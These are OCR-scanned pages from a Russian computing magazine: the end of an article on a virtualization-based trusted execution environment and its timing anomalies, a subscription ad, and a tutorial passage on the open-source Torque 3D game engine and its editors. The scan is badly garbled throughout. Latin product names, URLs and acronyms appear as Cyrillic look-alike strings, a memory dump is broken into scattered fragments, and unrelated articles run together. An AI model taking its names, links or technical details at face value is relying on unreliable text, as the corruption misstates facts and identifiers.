этот краткий миг «между прошлым и будущим» жизненным циклом ДС. В мо- 
мент рождения она, естественно, слаба и беззащитна, любой ее может «оби- 
деть» (подменить параметры) либо «угнать» (заменить программный код). 

Поэтому для активации доверенной среды выбирается момент, когда 
рядом никого нет, то есть доверенная среда активируется до загрузки ОС. 
Сразу после инициализации системы через ВІ05/ІІЕРІ управление переда- 
ется на загрузчик ДС, активирующий доверенную среду на «чистой» машине, 
и только после активации передает управление на штатный загрузчик ОС. 

Таким образом, ОС с момента своей инициализации даже не догадывает- 
ся о наличии на вычислительной установке скрытых от нее аппаратных и про- 
граммных ресурсов. 

Спрашивается, как организовать взаимодействие ОС и ДС, например вы- 
звать функцию, реализованную в ДС? Поскольку ОС ничего не знает о ДС, 
единственный способ начать им общаться — это использовать публичный 
ресурс — оперативную память общего доступа. 

Для этого приложение, функционирующее в ОС, выставляет в оператив- 
ной памяти сигнатуру, которую обнаруживает ДС. Затем, в рамках протокола 
обмена, в оперативной памяти инициализируются некие переменные, слу- 
жащие интерфейсом между ДС и приложением, которое захочет воспользо- 
ваться услугами ДС. 

Поскольку исходные данные и результаты работы ДС передаются через 
ОП общего пользования, их также могут «подсмотреть» и модифицировать. 
Но в большинстве случаев это не проблема, поскольку их можно зашифровать 
либо напрямую выдать в сеансе доверенного выполнения на какой-то аппа- 
ратный контроллер, к примеру на экран монитора либо в сетевой адаптер. 

И вот система славно поработала, «караул устал», оператору захотелось 
покурить, и он «усыпляет» систему. Такой вариант ДС не устраивает, потому 



что в режимах сна критические данные и коды могут выгружаться 
на внешние носители и, соответственно, там в беззащитном состоя- 
нии их можно анализировать и модифицировать. 

Поэтому в доверенной вычислительной среде используется 
принцип «умерла так умерла». Если запускается процедура сна или 
гибернации, то система вместо этого выключается, данные и про- 
граммы ДС не выгружаются на устройство долговременного хране- 
ния, — конечно, неудобно, но безопасность превыше всего.... 

ТЕХНИЧЕСКАЯ РЕАЛИЗАЦИЯ 

Для технической реализации нашей ДС мы будем использовать ап- 
паратуру виртуализации. Главная проблема использования аппара- 
туры виртуализации — это написать два абсолютно разных гиперви- 
зора, для Іпіеі и АМР соответственно. Это очень большой и сложный 
объем работы, который пришлось проделать с нуля. 

Тяжелым, но вынужденным решением стал отказ от поддержки 
начальных ревизий систем виртуализации для ІпѣеІ . Пришлось в це- 
лях надежности и функциональности ограничиться поддержкой на- 
чиная с версий 13, а это значит, что без поддержки технологии ЕРТ 
(расширенное страничное преобразование) в процессорах ІпіеІ до- 
веренная среда работать не будет. 

У процессоров АМЭ проблем с ранними версиями аппаратуры 
виртуализации нет, все их ревизии работают с ДВС, и вообще мне их 
система виртуализации нравится больше (и не мне одному). 

В результате родилась комбинированная технология, когда про- 
цессорное ядро для монопольного использования в доверенной 
среде изолировалось стандартным образом, одинаковым для про- 
цессоров АМЭ и Іпіеі, а все защитные и контрольные функции выпол- 
нялись при помощи аппаратуры виртуализации на остальных ядрах, 
функционирующих под управлением ОС. 

Изолированное ядро 

Это ядро должно быть ядром с последним номером, оно может 
быть логическим (при включенном гипертрейдинге), но всегда 
забирается в первозданном, не запятнанном работой с разными 
непроверенными программами состоянии. Его только проиници- 
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Щ Метогу 

йвЯЛЯІЛі^к^хІіІІ 

с 



I <=> 1 ; 0 




АсІсІгезБ = 00000000А6200000 



0 


00 


01 


02 


03 


04 


05 


06 


07 


08 


09 


0А 


ов 


ос 


00 


0Е 


0Р 


00 


27 


10 


20 


А6 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


10 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


20 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


30 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


40 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


50 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


60 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


70 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


80 


00 


10 


00 


20 


50 


А6 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


90 


00 


00 


00 


Е0 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


АО 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


ВО 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


СО 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


Е0 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


Р0 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 




Положения Процессы ! Службы [ Быстродействие | Сеть | П ользователи 



Загрузка ЦП 



Хронология загрузки ЦП 
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Хронология использования физической памяти 




Физическая память (МБ) 
Всего 

Кэшировано 

Доступно 

Свободно 

Память ядра (МБ) 

Выгружаемая 

Невыгружаемая 





Система 




3924 


Дескрипторов 


17247 


289 


Потоков 


1019 


2988 


Процессов 


68 


2730 


Время работы 


0:00:01:16 




Выделено (МБ) 


1073 / 7846 


104 






51 


Ф Монитор 


ресурсов... 



біагііпд Метогу (ипсііоп... 



Процессов: 68 Загрузка ЦП: 14% Физическая память: 23% 



Рис. 4. Корневая запись системной таблицы 

ализировал ВІ05, а после этого оно сразу попадает в ДС и там остается 
до выключения питания. 

Этим гарантируется надежность и предсказуемость поведения этого 
ядра в ДС: его состояние не модифицировано сторонними программами, 
а если его кто и «попортил», то только ВІ05, и все вопросы уже к его авторам. 
А если оно проходило проверку на НДВ — то к экспертам и методикам этих 
проверок. 

Его величество гипердрайвер 

Обычно программу, использующую аппаратуру виртуализации, называют 
гипервизор. Но это — большие программные комплексы с мегабайтами 
кода. В нашем случае задача попроще и кода-то всего ничего — не боль- 
ше десяти килобайт. Так что гипервизором назвать его язык не поворачи- 
вается, это не гипервизор, это «гипердрайвер» — так и будем его далее 
именовать. 

Гипердрайвер на процессорных ядрах, используемых ОС и прикладными 
программами, предназначен только для двух задач: во-первых, он должен 
обеспечить дополнительную защиту процессорного ядра и памяти доверен- 
ной среды, а во-вторых, выделять аппаратуру необходимых контроллеров 
ввода/вывода для сеансов доверенного обмена информацией. Пример ра- 
боты гипердрайвера приведен на рис. 2. 

Скриншот участка ОП для обычного режима работы ОС, ДС не активи- 
рована, и в этом месте памяти размещены таблицы ОС. На рис. 3 приведен 
скриншот этого же участка памяти, но с включенной ДС. 

В этой области памяти включена защита от доступа/модификации и ни- 
чего не видно, хотя по этим адресам реально находятся системные таблицы 
процессорного ядра доверенной среды. 

Но можно отключить защиту, и тогда в этих адресах ОП увидим факти- 
чески расположенную там корневую запись системной таблицы (РС) ДС 
(рис. 4). Сейчас ДС будет доступна для модификации и просмотра, но это 
только в отладочном режиме, естественно. 

ОГРАНИЧЕНИЯ ПРИМЕНЕНИЯ 

Работоспособность доверенной среды поддерживается, естественно, 
не на всех аппаратных платформах — слишком технически сложное реше- 
ние и не везде есть необходимое для этого оборудование. Обязательным 
условием является наличие аппаратуры виртуализации и хотя бы двух про- 
цессорных ядер. 

Для оборудования АМР этим ограничения и кончаются, с Іпіеі все гораздо 
сложнее: там стабильные и полнофункциональные версии аппаратуры вирту- 
ализации появились только года три-четыре тому назад и старые процессоры 
поддерживать работу ДС в полном объеме не будут. Кроме аппаратных огра- 
ничений, есть и ограничения на ВІ05 в части загрузчика ІІЕРІ, пока в образ 
загрузчика ОС не включен активатор ДС, это дело будущего. 

Из ограничений с программными компонентами есть одно: официальные 
системы виртуализации совместимы с гипердрайвером, только если они 
не используют аппаратную виртуализацию. 



Гипердрайвер, по праву «первой ночи», захватывает контроль 
над аппаратурой виртуализации и, естественно, больше никому ее 
не отдает, поэтому официальным гипервизорам приходится рабо- 
тать либо в режиме паравиртуализации, либо в режиме эмуляции 
нулевого уровня привилегий, что даже хорошо с точки зрения без- 
опасности и контроля. 

«ДЕНЬ СУРКА» 

Гипердрайверы, которыми я занимаюсь, пока не применялись в мас- 
штабных коммерческих проектах, но это не значит, что они вообще 
не использовались. Отнюдь, технология отработана, она надежна, 
но иногда встречаются аномалии. 

Это неудивительно, гипердрайвер в первую очередь работает 
с кремнием, и разные «беспределы» в нем (этому посвящены статьи 
цикла «Кремневый беспредел») гипердрайвером сразу выявляются. 
Это, можно сказать, «лакмусовая бумажка» — засунул в материнскую 
плату и сразу видишь, «что такое хорошо, а что такое плохо». 

Чтобы не быть голословным, приведу конкретный пример. Вот 
снимки того, что называется «хорошо» (рис. 5). 

На фотографии — экран тестовой программы замера времени 
выполнения команд и обработки исключений. Время считается в ма- 
шинных тактах, замер произведен на эталонной машине без гипер- 
драйвера — реально чистая машина, вопросов к ней нет. 

А вот эта же эталонная машина, но с загруженным гипердрайве- 
ром (рис. 6). 

Гипердрайвер «честный», он не пытается замаскировать свое 
присутствие в системе (к слову, таких возможностей у систем вирту- 
ализации множество, но здесь все по-честному, на честной машине). 

Видно, что время выполнения команд и исключений увеличивает- 
ся при загрузке гипердрайвера, и это нормально. 

Увеличение времени выполнения бывает двух типов. Первый 
тип, самый очевидный, — время увеличивается из-за входа в хост 
гипервизора, на снимке это команда СРІІЮ, ХЗЕТВѴ и РЮМ5В с не- 



ІМТЕІ. И БЕЗОПАСНОСТЬ 

После инициализации ВІ05 на платформе Іпіеі мы получаем машину 
с уже настроенными системами безопасности. Во многих случаях нет 
даже возможности посмотреть, как они настроены. А если и есть, то ни- 
чего изменить уже нельзя: выполнена аппаратная блокировка попыток 
модификации параметров. 

Так что надежность системы на платформе Іпіеі — это вопрос к сбор- 
щикам ВІ05 и архитекторам Іпіеі, я тут, как говорится, умываю руки... 
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Рис. 5. Честная, хорошая система! 
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Рис. 6. Эталонная машина с загруженным гипердрайвером 
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Рис. 7. Замер времени на плохой машине 



Рис. 8 ас гипердрайвером — совсем все плохо! 



корректным номером регистра. Циклы выполнения этих команд всегда уве- 
личиваются на 1200-1500 тактов, в зависимости от архитектуры и прошивки 
микрокода процессора. 

Второй тип увеличения длительности команд — появление дополнитель- 
ных стадий выполнения команды без выхода в хост гипервизора. Примером 
может служить левая часть экрана, где выведены значения М5Б-регистров 
и время доступа к ним. Время под гипервизором увеличилось в среднем 
на 30 тактов, эти такты тратятся на проверку соответствия номера текущего 
регистра со списком номеров регистров, требующих выхода в хост. То же са- 
мое касается доступа к памяти и обработки исключений, но там, естественно, 
увеличение длительности выполнения будет другим. Можешь посмотреть 
сам, на сколько тактов увеличивается время выполнения этих операций. 

Короче говоря, это чистая эталонная машина. А теперь посмотри на сним- 
ки экрана той же программы замера времени выполнения на машине, в кото- 
рой все «плохо» (рис. 7). 

Даже без гипердрайвера сразу видны проблемы: команда ХЗЕТВѴ не вы- 
полняется, но вполне возможно, что это отрабатывается исключение ІЮ — 
недействительный код команды. Теперь об однозначных проблемах: 

• команда СРІІЮ с недействительным номером запроса выполняется 

слишком долго; 

• запредельное время доступа к М5Б-регистрам с номерами ЗР8И-ЗРЕІ1; 

• не отключилось кеширование ОП , МеплАсс показывает время доступа 

к ОП через кеш, а не время прямой транзакции в контроллер памяти. 

Запускаем на этой плохой машине гипердрайвер, теперь все стало со- 
всем плохо (рис. 8). 

Во-первых, на этой машине гипердрайвер установил мировой рекорд: 
он умудрился зайти в хост и выйти из него при обработке команды СРІІЮ 



за 750 тактов. Я такое вижу впервые, объяснение одно: счетчик тактов рабо- 
тает неправильно, чудес на свете не бывает... 

Во-вторых, установлен и антирекорд: при выполнении команды РЮМ5В 
с недействительным номером регистра вход в хост и выход занял практи- 
чески 3000 тактов. Диагноз тот же, опять счетчик тактов отработал непра- 
вильно... 

В-третьих, не увеличилось время доступа к М3 Р- регистрам, наблюдает- 
ся полный хаос, но в среднем оно практически не изменилось... 

В-четвертых, опять не отработал доступ к оперативной памяти, время 
увеличилось только на 300 тактов — это время для теневой трансляции, 
но физический доступ все равно идет в кеш... 

Можно только гадать, что за чудеса творятся на этой машине. Вариан- 
тов несколько: это может быть особенность реализации режима системно- 
го менеджмента, специфика прошивки микрокода, необычная активность 
сервисного процессора, но может быть и встроенный в ВЮЗ гипервизор, 
по типу того, что был описан в статье «Китайские закладки». 

Естественно, на такой «паленой» машине ни о какой доверенной среде 
говорить не приходится, да она и не загружается, виснет в середине загруз- 
ки ОС... 

«АНАПОСЛЕДОКЯ СКАЖУ 

И скажу без лишней скромности: в муках родилась абсолютно новая концеп- 
ция информационной безопасности. 

Она не просто родилась как абстрактный фантом, а реализована в виде 
программной платформы. На эту платформу можно «навешивать» различные 
полезные нагрузки, но пока, насколько мне известно, владелец технологии 
(фирма «Код Безопасности») планирует внедрять ее в области ДБО. Что бу- 
дет дальше — посмотрим. НЕ 
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Нас часто спрашивают: «В чем преимущество подписки?» 

Во-первых, это выгодно. Потерявшиесовесть распространи- 
тели не стесняются продаватьжурнал за 300 рублей и выше. 
Во-вторых, это удобно. Не надо искатьжурнал в продаже 
и бояться проморгать момент, когда весьтиражуже раз- 
берут. В-третьих, это быстро (правда, это правило действует 
недля всех): подписчикам свежий выпускотправляется рань- 
ше, чемон появляется на прилавкахмагазинов. 
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ТОРКАЕТ 

НА ОТЛИЧНО! 



Тощие зП: опенсорсный 
движок для хардкорных игр 

Надвижке Тощие 30 (и его предках) выпуще- 
но немало тайтлов на различных платфор- 
мах. Движок подходит для игр самых разных 
жанров: начиная с шутеров от первого лица 
и гонок до казуальных головоломок и хард- 
корных стратегий. Но самое главное до- 
стоинство — его любит Юрий Язев и пишет 
на нем ММОНРО (хорошо быть редактором — 
вот так берешь и вмешиваешься в чужой 
текст. — Прим. ред.). Ладно, шучу. Второе его 
главное достоинство — он опенсорсный! 



Юрий «уигетЬо» Язев 

► Ведущий программист компании СІепотеСІатез 

уагеѵзоІКЗдтаіІ.сот, ѵѵѵѵѵѵ.рдепот.ги 



ТОПОІІЕЗО: ПРЕДЫСТОРИЯ 

Для понимания принципов любого программно- 
го продукта неплохо обратиться к его истории. 
У современного Тогдие ЗЭ она весьма длинная 
и тернистая. 

А началось все в 2001 году, когда компания 
Оупапліх разработала игру ТгіЬез 2. В том же году, 
после того как издатель игры — компания Зіегга 
была расформирована, ключевые сотрудники 
Оупапліх организовали фирму СагадеСаплез, 
которая стала заниматься доработкой и разви- 
тием движка от ТгіЬез 2, впоследствии получив- 
шего имя Тогдие Сате Епдіпе. Стоит отметить, 
что в качестве графической подсистемы этот 
движок использовал ОрепСІ_. В последующие 
годы ТСЕ развивался, и в 2007 году был выпу- 
щен Тогдие Сате Епдіпе АсІѵапсесІ, главным от- 
личием которого стало использование Эігес1:Х. 
В 2009-м началась новая эра — был выпущен 
движок Топкие 30 . Время шло, движок совер- 
шенствовался, его цена постепенно понижалась. 
И в сентябре 2012 года СагадеСаплез выпустила 
движок в Ореп Зоигсе под лицензией МІТ. С тех 
пор Тогдие ЗЭ стал развиваться еще динамичнее. 

Между тем СагадеСаплез занималась разра- 
боткой не только одного продукта. После выхода 
ТСЕА СагадеСаплез начала разработку двумер- 



ной версии движка — Тогдие 20 , впоследствии 
названного Тогдие Сате Виіісіег. Позднее эти два 
направления ( 20 - и ЗЭ-движки) получили мно- 
жество ответвлений: версии под ОЗ X, ІОЗ, І_іпих, 
ХЬох 360, ѴѴіі, даже была версия движка под ХЫА 
(так называемый Тогдие X). Однако на сегодняш- 
ний момент СагадеСатез поддерживает только 
два движка. Тогдие 20 имеет одну кодовую базу 
для трех операционных систем: ѴѴіпбоѵѵз, ОЗ X, 
ІОЗ; при этом код Тогдие ЗЭ компилируется под 
две оси: ѴѴіпсІоѵѵз и І_іпих, но в последней работа- 
ет только в консольном режиме — чтобы можно 
было запустить выделенный сервер. 

ТОПСШЕ 30: ТЕКУЩЕЕ СОСТОЯНИЕ 

Подобно движку ісІТесІл (начиная со второй вер- 
сии), на котором строится серия Оиаке, Тогдие 
использует клиент-серверную архитектуру даже 
для однопользовательских игр. Это позволяет ре- 
ализовывать как синглплеерные, так и мультипле- 
ерные игры, не внося изменений в кодовую базу. 

Сейчас существует уже третья версия движка, 
тогда как на момент выхода в «свободное плава- 
ние» была только версия 1 .2. Вкратце обрисуем 
текущее состояние Тогдие 30 . 

Для визуализации используется ЭігесІХ 9.0. 
Несмотря на то что имеются более свежие вы- 



пуски либы, девятка стала негласным стандар- 
том для рендеринга в реальном времени — во 
многом из-за появления и широкого распростра- 
нения портативных машин низкой мощности, 
в играх для которых Торк обрел новую жизнь. 
Между прочим, графический пайплайн — очень 
сильная сторона движка, тем самым он выдает 
высокий РРЗ для картинки отличного качества 
даже на морально устаревших машинах. 

В Тогдие ЗЭ имеется поддержка РЬузХ, 
но в большинстве проектов его использование 
излишне, обычно достаточно стандартной физи- 
ческой подсистемы. Движки семейства Тогдие 
всегда славились своей сетевой подсистемой. 
На протяжении прошлых лет с этим нельзя было 
не согласиться, однако время идет, конкурен- 
ты не спят и совершенствуют свои технологии. 
И сейчас, к сожалению, сетевую подсистему Тор- 
ка нельзя назвать лидером индустрии. Движок 
перестал отвечать ее требованиям, поэтому, что- 
бы реализовать поддержку большого числа одно- 
временно играющих пользователей (для ММОС), 
приходится модифицировать сетевую систему. 

С помощью сгенерированного при компиля- 
ции плагина можно запустить игру в браузере. 
Поддерживаются все мало-мальски распростра- 
ненные браузеры. 
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Одним словом, все эти фичи унаследованы 
от предыдущих версий движка и подогнаны под 
современные реалии. Тем временем после вы- 
хода в Ореп Зоигсе движок получил дополнитель- 
ные возможности: в третьей версии присутству- 
ет поддержка контроллера І_еар Моііоп ( Шоз:// 
ѵѵѵѵѵѵ.Іеаотоііоп.соітО . джойстика Вагег Нусіга 
( \л/\л/\л/.га 2 ег 20 пе.сот/тіпізі 1 :е/ІіѵсІга ). очков вир- 
туальной реальности Осиіиз РШ ( ѵѵѵѵѵѵ.осиіизѵг. 
сот ). 

ПОДГОТОВКА: ИНСТАЛЛЯЦИЯ 
И СОЗДАНИЕ ПРОЕКТА 

Чтобы установить Тощие ЗЭ, можно по отдель- 
ности скачать с СіІНиЬ части пакета, включаю- 
щего собственно сам движок, документацию 
(по скриптовому языку) и менеджер проектов. 
С другой стороны (и это более предпочтитель- 
ный вариант), все это можно скачать одним ар- 
хивом с сайта СагадеСаплез.сопл по ссылке: тіі. 
аагааеаатез.сот/ТогаиеЗР-3-0.2ір . Все это 
хозяйство весит чуть более 338 Мб. Поскольку 
доступен весь исходный код движка, то для его 
сборки нужен ѴізиаІ ЗШсІіо ’08, ’ 10, ’ 12. Кро- 
ме того, для компиляции движка понадобится 
РігесІХ ЗРК Зипе ’10. Вдобавок для редактиро- 
вания скриптов очень рекомендую специаль- 
но предназначенную для этого прогу — Тогзіоп 
( ѵѵѵѵѵѵ.аагааеаатез.сот/ргосіисіз/іогзіоп ). 
Она стоит денег, но этот редактор достоин сво- 
ей цены. Он включает не только подсветку син- 
таксиса языка Тощие Зсгірі: и стандартные фичи 
кодерского текстового редактора, но и менеджер 
проекта (в стиле ѴЗ) и полнофункциональный от- 
ладчик. Последний — просто незаменимая вещь! 

Скачав архив с движком, распакуй его в пред- 
почтительное место. Внутри находятся несколь- 
ко папок и файлов; обратим внимание на со- 
держимое папки Теплріаіез, там две подпапки: 
Етріу и РиІІ, содержимое которых используется 
в качестве стартовой точки для создания нового 
проекта. Полезным дополнением (для образо- 
вательного процесса) будет еще один образец: 
РРЗ_Ти 1 :огіаІ. 2 Ір ( із.асШУбІсВ ): распаковать и по- 
местить содержимое архива в папку Тетріаіез. 

Создадим новый проект. Запусти Ргоіесі: 
Мападег.ехе. В появившемся окне нажми кнопку 
«ІМеѵѵ РгоіесК Откроется еще одно окно, где бу- 
дет предложено ввести название будущего про- 
екта и выбрать образец, на основе которого этот 
проект будет создан. На этом шаге выбери «РиІІ», 
позднее я выскажу свои мысли на этот счет. На- 
жимаем «СНоозе Мосіиіез», отобразится окно, 
в котором можно выбрать используемые в созда- 
ваемом проекте модули. 

Из ниспадающего списка выбирается модуль, 
отвечающий за передачу данных о перемещении 
аватара. Их три: ЗіапсІагсІ Моѵе СІазз представ- 
ляет наиболее часто используемый метод пере- 
дачи данных между клиентом и сервером, НІРІ 
ІМеІл/ѵогкіпд больше подходит для жанра «гонок» 
и при этом требует настройки, ЕхіепсІесІМоѵе был 
добавлен в третью версию для поддержки новых 
контроллеров. В списке ниже можно выбрать ис- 
пользуемую в игре физическую подсистему; еще 
ниже можно изменить звуковой движок — вклю- 
чить РМосІ. Если в игре планируется использовать 
новые устройства ввода-вывода, то в этом окне 
необходимо указать пути к папкам с их ЗЭК. Фла- 
жок ѴѴеЬ Оеріоутепі:, по идее, включает создание 
плагина, но его можно скомпоновать и не выстав- 
ляя флажок. В итоге, закрыв окно выбора моду- 
лей, создадим проект, нажав кнопку «Сгеаіе». 
Отобразится окошко с прогрессом генерации 
проекта из образа, когда процесс завершится, 
тебя известят. Посреди менеджера появится 



иконка только что созданного проекта. Создава- 
емые игры помещаются в подпапку Му Ргоіесіз. 

ТОПСШЕЗО: 

ПРОГРАММЕРСКОЕ МЫШЛЕНИЕ 

Если тебе приходилось разрабатывать игры, на- 
пример, с помощью Ііпііу ЗЭ, то работа с Тощие 
ЗЭ может показаться непривычной, и чем больше 
ты работал с другим движком, тем сильнее будет 
чувствоваться разница. Так, в принципе, в ІІпііу 
проект создается с нуля, а в Тощие — на основе 
готовой игры. Я не собираюсь разводить холивар 
на тему, что лучше и какой подход правильнее. 
Однако я хочу сказать, что эти движки имеют 
кардинально разные идеологии, различающи- 
еся подходы к созданию игр. Другими словами, 
в Тощие происходит наполнение и редактирова- 
ние мира. При всем при этом, разрабатывая игру 
на Тощие, писать кода требуется больше, чем 
при таком же процессе на ІІпііу; можно сказать, 
что первый больше нацелен на кодера, тогда 
как второй — на дизайнера. В Тощие нет подхо- 
да: перетащи эту штуку на ту фигню, и при удач- 
ном стечении обстоятельств все заработает. 
Но описанная возможность кажется мне шаман- 
ством, а не программированием. 

Как я уже говорил, главное преимущество 
Тощие перед другими движками — это наличие 
полного исходного кода, что действительно по- 
зволяет заточить движок под свой проект. 

Ранее при создании проекта мы встретились 
с выбором шаблона; у меня есть некоторые со- 
ображения по поводу выбора между Етр1:у и РиІІ. 
Оба используют один и тот же движок, что на С++, 
однако у них различные содержания начальных 
скриптов и арта; так, у Етріу практически нет ни- 
чего, с другой стороны, у РиІІ-проекта есть бога- 
тый багаж скриптов и арта. Сюда входят: простой 
аватар, которого можно увидеть от третьего лица, 
оружие и некоторый другой арт; из скриптов это: 
датаблоки персонажа и оружия, дополнительный 
клиентский и серверный код для оружия, транс- 



портного средства, снарядов, реализации чата 
и многого другого. Таким образом, создав на ос- 
нове РиІІ-шаблона свою игру, мы имеем крутой 
базис, который вправе дополнять и изменять. 
Между тем я встречал расхожее мнение, что надо 
создавать из Етріу, поскольку из РиІІ нельзя уда- 
лить ненужный контент. Это бред! Торковский 
проект легко поддается любой модификации. 

После создания девственный проект, к кото- 
рому еще не прикасалась рука программиста, 
состоит из следующего контента: в папке агі: на- 
ходятся все модели, текстуры, звуки и другие 
нарисованные дела, в папке Соге содержатся 
основные скрипты, составляющие ядро движ- 
ка. В папке І_еѵеІз лежат файлы миссии. В папке 
Зсгіріз расположены три подпапки: СІіепІ:, Зегѵег, 
Сиі; первые две содержат скрипты для кли- 
ентской и серверной частей движка, а каталог 
Сиі — для управления некоторыми элементами 
пользовательского интерфейса. Папка ЗНасІегз 
содержит используемые движком шейдеры. 
В каталоге Іооіз находятся торковские редакторы 
(их мы обсудим ниже). В папке ѴѴеЬ лежит заго- 
товка для веб-плагина. Имеющиеся кроме ката- 
логов файлы представляют собой: исполняемый 
файл игры, динамическую либу движка, плагины 
(если скомпонованы) и необходимый скрипт — 
таіп.сз. 

ТОПСШЕ 30: ОБЗОР РЕДАКТОРОВ 

Игровой движок тем и отличается от чистого про- 
граммного интерфейса, что в нем присутствуют 
различные редакторы, позволяющие работать 
над игрой не только программистам, но и раз- 
ным І_еѵеІ -дизайнерам. Движки — лидеры инду- 
стрии обладают рядом полезных и упрощающих 
разработку игры в целом редакторов. Тощие ЗЭ 
нисколько не отстает в этом плане; он содержит 
полный набор необходимых редакторов, которые 
мы быстро рассмотрим в этом разделе. 

Запусти свою игру, исполняемый файл кото- 
рой находится в подпапке дате твоего проекта. 
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Рис. 3. Теггаіп Раіпіег 



Рис. 4. Деколи 



Отобразится меню, в котором нас интересует 
самая верхняя кнопка — «РІау», после ее нажатия 
будет предложено выбрать уровень. По умолча- 
нию их два: Етріу Поот и Етріу Теггаіп. Выберем 
второй. Начнется загрузка уровня. При первом 
запуске, кроме загрузки датаблоков, объектов 
и миссии, вначале произойдет распаковка/им- 
портирование мешей из СоІІасІа (*.сІае) формата 
в стандартный торковский сііз. В будущем дви- 
жок, обнаружив эти файлы, будет напрямую их 
загружать. Так что первая загрузка будет долгой. 

В результате запустится игра с видом от пер- 
вого лица. В ней есть минимум для дальнейшего 
совершенствования: пользовательский интер- 
фейс, оружие, счетчики жизней и патрон, при на- 
жатии на <ТаЬ> камера переключится на вид 
от третьего лица, где можно увидеть аватара. 
Немного побегав и оценив свои возможности, 
можно отметить, что, конечно, способов взаимо- 
действия по сравнению с современными игра- 
ми маловато, однако это всего лишь заготовка! 
Для запуска редактора мира во время игры наж- 
ми <Р11>. 

ѴѴогІсІ Есіііюг представляет собой оболочку 
для других, узкоспециализированных редакто- 
ров. ѴѴогІсІ Есіііюг содержит 14 редакторов. Откры- 
ваемый вместе с редактором мира ОЬіесІ Есіііюг 
служит для добавления, удаления и изменения 
свойств объектов. Его тулбар позволяет выбрать 
режим камеры, шаг ее перемещения, задать ре- 
жимы отображения, настроить точки привязки, 
сетку, сформировать префабы и много чего друго- 
го. Здесь также есть панель выбора инструмента 
для преобразования выделенного объекта: пере- 
мещение, вращение, масштаб. Панель ЗсепеТгее, 
находящаяся у правой границы окна, содержит 
две вкладки: Зсепе и ЫЬгагу. На первой в списке 
находятся все имеющиеся в миссии объекты. Если 
в этом списке или в отображаемой в основной 
области видимости сцене выбрать объект, ниже 
на панели Іпзресіюг отобразятся его свойства. Их 
можно непосредственно редактировать. Вторая 
вкладка панели Зсепе Тгее — ЫЬгагу содержит все 
объекты, которые можно добавить в мир игры. Это 
как обычные меши, заскриптованные объекты, так 
и специальные объекты движка: камеры, зоны, 
порталы, пути и так далее. Следующий редактор, 
Теггаіп Есіііюг помогает модифицировать ланд- 
шафт: создавать горы и впадины, дыры и про- 
чее. Инструменты редактора для осуществления 
преобразований находятся на дополнительной 
панели. Теггаіп Раіпіег позволяет раскрашивать 
ландшафт с помощью материалов, которые до- 
бавляются в окне Теггаіп Раіпіег МаіегіаІ Зеіесіюг 
посредством создания нового слоя, для него за- 



дается текстура. В тулбаре настраивается размер 
и форма кисти. Кроме того, в редакторе есть ав- 
томатическая раскраска — АиІоРаіпІ, которая кра- 
сит с учетом параметров высоты и наклона. Очень 
полезная вещь! Маіюгіаі Есііѣог помогает создавать 
материалы, которые могут быть применены к лю- 
бому объекту. При настройке материала редактор 
позволяет задать текстуру для каждого канала 
(ЭіТТизе, ІМогтаІ, Зресиіаг), настроить эффекты 
освещения, анимации (для материала) и другое. 
Зкеісіі ТооІ используется для создания выпуклых 
фигур. Честно сказать, редко используемая при- 
блуда. ЭаІаЫоск Есііѣог позволяет создавать и ре- 
дактировать датаблоки. С датаблоками мы разбе- 
ремся поздней. Использование этого редактора 
похоже на работу с другими торковскими редак- 
торами: выбираем в верхней панели (Эа1:аЫоск 
ЫЬгагу) нужный датаблок, а в нижней модифици- 
руем определенные свойства. ЭесаІ Есіііюг слу- 
жит для редактирования графических меток. Это 
особый тип объектов. Подобные метки использу- 
ются в качестве следов персонажей и/или следов 
от пуль огнестрельного оружия. 

Деколи представляют собой двумерные тек- 
стуры, наложенные на поврежденную поверх- 
ность. Рогезі: Есіііюг — прекрасное средство соз- 
дания массива однотипных или схожих объектов, 
в большинстве случаев деревьев. 

МезЬ НоасІ Есіііюг, как и следует из названия, 
создает дороги; они прокладываются подобно 
рисованию кривых Безье, чтобы они выглядели 
по-разному, изменяются используемые матери- 
алы. Міззіоп Есіііюг Агеа устанавливает размеры 
уровня. С помощью РагИсІе Есіііюг можно создать 
и отредактировать системы частиц. Редактор об- 
ладает широкими возможностями для настрой- 
ки как источника, так и самих частиц. Имеется 
большой выбор заготовок: это и взрывы, и огонь, 
и дым, и пузыри, а также многое другое. Віѵег 
Есіііюг позволяет создавать реки, ничего неожи- 
данного здесь нет. ВоасІ Есіііюг — это усовершен- 
ствованный редактор дорог, который проклады- 
вает пути в соответствии с рельефом местности. 
8Ьаре Есіііюг — это прекрасное дополнение, по- 
явившееся в первой версии Тощие ЗЭ 1.01 по- 
сле ряда бета-версий, оно облегчило настройку 
персонажей, сделав их доводку непосредствен- 
но в движке. Позволяет загружать необходимые 
анимационные секвенции, ставить триггеры 
на определенные кадры, блендить (смешивать 
анимации) — например чтобы перс одновре- 
менно бежал и стрелял, — с его помощью можно 
настраивать коллизии, и еще многими другими 
возможностями обладает этот редактор. Короче, 
превосходный инструмент! 



Еще один мощный редактор, имеющий- 
ся в Тощие ЗЭ, — это Сиі Есіііюг. Название само 
говорит о его предназначении. Он вызывается 
при нажатии на <Р10>. Принципы работы с ним, 
по существу, такие же, как при работе с други- 
ми ѴѴУЗІѴѴУС-редакторами: выбираем на панели 
